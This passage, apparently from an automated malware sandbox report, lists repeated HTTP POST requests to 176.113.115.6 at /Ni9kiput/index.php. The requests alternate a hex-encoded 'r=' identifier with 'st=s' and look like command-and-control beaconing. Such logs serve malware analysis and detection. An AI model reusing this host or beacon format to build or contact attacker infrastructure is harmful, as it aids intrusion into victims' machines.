                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
